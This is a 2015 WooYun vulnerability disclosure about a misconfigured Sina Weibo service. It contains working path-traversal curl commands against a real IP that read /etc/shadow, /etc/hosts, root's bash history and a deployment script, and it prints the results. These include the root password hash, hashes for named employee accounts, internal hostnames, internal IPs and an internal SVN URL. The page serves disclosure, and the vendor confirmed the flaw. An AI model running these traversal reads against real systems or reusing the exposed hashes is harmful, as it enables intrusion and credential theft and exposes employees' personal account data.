当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-092186

漏洞标题:新浪微博某服务配置不当导致任意文件读取(包括root账号hash及员工svn账号密码等)

相关厂商:新浪

漏洞作者: boooooom

提交时间:2015-01-16 11:47

修复时间:2015-03-02 11:48

公开时间:2015-03-02 11:48

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-16: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-02: 细节向公众公开

简要描述:

RT

详细说明:

[[email protected] ~]# curl 111.13.87.67:8888/../../../../../../../../../../../../../../../../../etc/shadow
root:$1$/Vj1rnrn$3dS12x/BPIrBd40vFMXnM0:15958:0:99999:7:::
bin:*:15240:0:99999:7:::
daemon:*:15240:0:99999:7:::
adm:*:15240:0:99999:7:::
lp:*:15240:0:99999:7:::
sync:*:15240:0:99999:7:::
shutdown:*:15240:0:99999:7:::
halt:*:15240:0:99999:7:::
mail:*:15240:0:99999:7:::
uucp:*:15240:0:99999:7:::
operator:*:15240:0:99999:7:::
games:*:15240:0:99999:7:::
gopher:*:15240:0:99999:7:::
ftp:*:15240:0:99999:7:::
nobody:*:15240:0:99999:7:::
dbus:!!:15958::::::
rpc:!!:15958:0:99999:7:::
vcsa:!!:15958::::::
abrt:!!:15958::::::
saslauth:!!:15958::::::
avahi:!!:15958::::::
haldaemon:!!:15958::::::
postfix:!!:15958::::::
rpcuser:!!:15958::::::
nfsnobody:!!:15958::::::
tss:!!:15958::::::
ntp:!!:15958::::::
sshd:!!:15958::::::
mailnull:!!:15958::::::
smmsp:!!:15958::::::
tcpdump:!!:15958::::::
oprofile:!!:15958::::::
libin1:$1$LxQ23rop$EqRUMuH2PITFGG1347H6H0:15958:0:99999:7:::
junhai:$1$2pEYlCCU$bU5W6REpCXxnKyUBeFYAA.:15958:0:99999:7:::
qingming:$1$WssErGcK$7xlhkvjiV3pKmt/GUKzAB1:15958:0:99999:7:::
liyuan:$1$LMNKRKcI$8rKnsZW0WBDlXmT2Xhhp3.:15958:0:99999:7:::
hangang:$1$y2Giuqbq$3.C0HAwk.FA6waWROEGet.:15958:0:99999:7:::
wangshuo:$1$3D0hBm7z$4E2ZxFyqebpiXBe40bHXe.:15958:0:99999:7:::
genlei:$1$Pfjw2PWM$CDYtMlFKDfS.VOhu5dHH91:15958:0:99999:7:::
xiaoyue1:$1$haxsHhYo$GroW6eMl.T44EHInmpg.B0:15958:0:99999:7:::
:15958:0:99999:7:::8vekiqujTNVtuc8guL0
:15958:0:99999:7:::fkhZgdOwI9AGW5veDXz40
sysmon:!!:15958:0:99999:7:::
zuohui1:*:15958:0:99999:7:::
zhangjian6:*:15958:0:99999:7:::
yulin5:*:15958:0:99999:7:::
pengjie:*:15958:0:99999:7:::
zhizhao:*:15958:0:99999:7:::
puppet:!!:15959::::::
gateway:!!:15959:0:99999:7:::
xiongjun:*:15974:0:99999:7:::
weiliang:*:15974:0:99999:7:::
leilei3:*:15974:0:99999:7:::
zhangteng:*:15974:0:99999:7:::
xiaodong8:*:15974:0:99999:7:::
junbo1:*:15974:0:99999:7:::
yaowei:*:15974:0:99999:7:::
yujie6:*:15974:0:99999:7:::
qianyong:*:15974:0:99999:7:::
rdsup_api:*:16027:0:99999:7:::
shukui1:*:16027:0:99999:7:::
chenyang:*:16027:0:99999:7:::
bangjian:*:16044:0:99999:7:::
mysql3306:!!:16064::::::
nagios:!!:16064:0:99999:7:::
kaiwei3:*:16065:0:99999:7:::
zabbix:!!:16080::::::
maqian:*:16083:0:99999:7:::
guochao3:*:16127:0:99999:7:::
mysql:!!:16128:0:99999:7:::
wangmeng5:*:16148:0:99999:7:::
xiaofeng6:*:16197:0:99999:7:::
xiaodong2:*:16197:0:99999:7:::
wb_liukai:*:16205:0:99999:7:::
wb_guorui:*:16205:0:99999:7:::
wb_zhuoyue:*:16233:0:99999:7:::
hean:*:16254:0:99999:7:::
zhuxing:*:16262:0:99999:7:::
wenyue1:*:16262:0:99999:7:::
wangchong4:*:16262:0:99999:7:::
zhongxiu:*:16262:0:99999:7:::
yangyang3:*:16262:0:99999:7:::
baohua:*:16388:0:99999:7:::
tangkai:*:16409:0:99999:7:::
jinlong11:*:16415:0:99999:7:::


[[email protected] ~]# curl 111.13.87.67:8888/../../../../../../../../../../../../../../../../../etc/hosts
127.0.0.1 D13050945.web.mobile.qs.mobile.sina.cn   localhost localhost.localdomain localhost4 localhost4.localdomain4
172.16.35.215   D11114152.lbs.weibo.cn
127.0.0.1 mobile.trend.recom.i.weibo.com
#127.0.0.1 trend.recom.i.weibo.com

漏洞证明:

[[email protected] ~]# curl 111.13.87.67:8888/../../../../../../../../../../../../../../../../../root/.bash_history|tail
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 23141  100 23141    0     0  71784      0 --:--:-- --:--:-- --:--:-- 71866
#1421287600
./publish_v4_new.sh 
#1421290874
./publish_v4test_new.sh 
#1421290938
./publish_v4_new.sh 
#1421320293
./publish_v4test_new.sh 
#1421320359
./publish_v4_new.sh


[[email protected] ~]# curl 111.13.87.67:8888/../../../../../../../../../../../../../../../../../root/publish_v4_new.sh
#!/bin/sh
SVN=/usr/bin/svn
SVNURL=https://svn1.intra.sina.com.cn/weibo_bp/uve_render/render/v4/
RSPATH=/data0/www/codePublish/svn_mobile/trendcode/v4/
USERNAME=******
PASSWORD=********
#IP=(111.13.87.67 111.13.87.68 111.13.87.69 111.13.87.70 111.13.87.71 111.13.87.72)
IP=(172.16.38.67 172.16.38.68 172.16.38.69 172.16.38.70 172.16.38.71 172.16.38.72 172.16.38.169 172.16.38.170 172.16.38.171 10.13.0.22 10.13.2.106 10.13.2.107 10.77.96.103)
Exc="--exclude=.svn"
echo "load code from svn..."
$SVN checkout $SVNURL $RSPATH --username=$USERNAME  --password=$PASSWORD
for i in ${IP[*]}
    do
        echo ""
        echo ""
        echo "rsync to "${i}
        /usr/bin/rsync  -avH --delete --progress  ${Exc} ${RSPATH} ${i}::rsync_www/v4/
    
    done

修复方案:

嗯~

版权声明:转载请注明来源 boooooom@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-16 13:36

厂商回复:

感谢关注新浪安全,漏洞修复中。

最新状态:

暂无